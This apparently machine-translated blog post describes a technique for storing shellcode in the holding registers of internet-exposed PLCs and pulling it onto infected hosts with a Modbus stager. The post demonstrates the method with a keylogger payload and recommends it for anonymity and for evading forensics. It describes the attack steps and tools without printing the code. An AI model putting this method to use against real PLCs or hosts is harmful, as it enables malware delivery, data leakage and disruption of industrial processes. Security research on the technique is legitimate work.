Use PLC as Payload/shellcode distribution system

This weekend, I have been tinkering with Modbus, and the use of assembly language developed a stager, which can be downloaded from the PLC hold register payload. Since a large number of PLCs are exposed to the Internet, I can't help but wonder if they can use the processing power and memory they provide to store certain payload for later downloading (from Stager).

So, we might consider the following scenario:

1. The attacker searched the internet for a plc with sufficient space to store the payload. In fact, Modbus devices with dozens of KB of memory are easy to find.

2. The attacker uploads the payload to the PLC's memory.

3. The attacker infects a host with dropper and then uses Stager to "communicate" with Modbus to download and execute the stage from the PLC.

The advantages of using PLC to keep Register storage payload

Because of the use of third-party PLC, so it has a good anonymity, tracking is very difficult. There is no need to upload payload to the server.

Because the payload is stored in the PLC memory, it increases the difficulty of forensic analysis. In addition, once the payload is removed, its contents can be easily overwritten (and even stager itself can do this).

In addition, I think Modbus stager is also very useful in some ICS environments, because protocols outside of Modbus can be alerted, and Winhttp/wininet Stager is not the most applicable. So, in this case, you only need a modbus handler or just an emulator to provide the stage when the stager connects to it. In addition, we found that many networks have modbus devices that can be remotely managed, so they are also useful for this stager.

Important: Do not perform these operations on any third-party PLCs. Any write operation on the PLC registers may destroy the original Process Control strategy.

Number of PLCs active on the Internet using Modbus protocol

In order to figure out the number of PLCs exposed to the Internet, using the Modbus protocol, I wrote a small script using the Censys API. If your network card is performing well, you can use tools such as Masscan or Zmap to scan the internet for devices that run the Modbus protocol on port 502.

It can be seen from the following output that at least 5,500 PLCs are available.

Many of these IPs are just honeypot, which is easy to see, for example, Conpot and other services hosted in a cloud service. As far as this article is concerned, even if the honeypot does not matter, as long as their memory is large enough on the line.

How to upload payload to the PLC hold register

Well, in order to upload payload to the PLC, I wrote a python script called plcinjectpayload.py. Depending on the control strategy being loaded, the requirements for the available memory size of the PLC also vary, so the script first checks to see if they have enough memory space to hold the corresponding payload. To detect the size of the memory, a Modbus request with an operation ID of 03 (read hold register) can be sent to attempt to read a specific record (16 bits per record length) from an address. If you receive a 0x83 exception, then the PLC is not available to us.

To upload payload, use the-upload option, as shown below. This option allows you to specify the starting address using the parameter-addr, that is, start loading the payload from this hold register number (or address 0 if unspecified).

If payload has an odd number of bytes, it needs to be populated with "0x90" to avoid some problems while reading. In the previous example, the size is 1536 bytes; To check if the load operation was successful, we can use the option-download to download the same number of bytes from address 0.

Obviously, the script can not only upload payload, but can actually upload any type of file. So, we think it's an interesting way to leak and share information. Imagine who would suspect that a public Plc's save register would have a. docx or. zip file?

It is important to note that the records that hold the payload may be changed by the PLC. Since we do not know the PLC I/O and its Process Control strategy, we need to look for a memory range that is not normally modified. To do this, we can load the payload into a range, and then for a period of time, payload has not found any changes after many checks, this is the area of memory we are looking for. To achieve this, we can use plcinjectpayload.py and several other bash commands.

Read the payload stored in the PLC in the controlled host

After the payload is uploaded to the PLC, it must also be read from the victim's computer. To this end, I have established a stager based on the Modbus protocol; it is less than 500 bytes in size (I will try to make it smaller). where its reverse_tcp and BLOCK_API codes are taken from Metasploit (https://github.com/rapid7/metasploit-framework/tree/master/external/ Source/shellcode/windows/x86/src/block). Block_recv_modbus.asm's ASM code is shown, and part of its responsibility is to acquire payload through the Modbus protocol. Therefore, this code needs to communicate with the PLC through the Modbus protocol, the following corresponding payload. The code here uses the first 4 bytes to understand the stage size and allocates the necessary memory through the VirtualAlloc. The payload is then obtained by continuously sending a "read holding" Request (function code 03). According to the agreement, for each read request, the PLC can return up to 250 bytes (125 hold registers), therefore, stager can use it as a unit, gradually download payload.

Instance parsing

Let's look at a practical example. Recent I found a keylogger for the Windows system on the Www.exploit-db.com website, with a size of only 600 bytes, and although it is small in size, it is sufficient for a POC with only a few Modbus requests (remember that the maximum number of bytes per request is 250 bytes) The After the shellcode is executed, the keystroke action is written to the "Log.bin" file in the user's%temp% directory.

Therefore, we first put the payload in a binary file, and put its length in front of it, here is the length of the small end byte (4 bytes).

Now, let's upload it to the PLC starting at address 0:

Once this stager is running, it will download the PAYLOAD:250 + 250 + 102 = 602 bytes via 3 requests. The Modbus communication process is described in detail.

The tracking of the above communication process is demonstrated by Wireshark. The Process Monitor window indicates that the stage is running successfully (checking the Log.bin file will see the saved keystrokes)

I have verified this code through the Modbus emulator and the actual plc, and everything is OK, but as I mentioned earlier, I think the shellcode can be further optimized. For the first test, I created a modbus handler in Python (plcmodbushandler.py) to send the payload to stager.

I'm trying to transplant this handler to Metasploit. For more information, please watch the video below.

Reference Link: http://bobao.360.cn/learning/detail/3311.html

Original link: http://www.shelliscoming.com/2016/12/modbus-stager-using-plcs-as.html

Use PLC as Payload/shellcode distribution system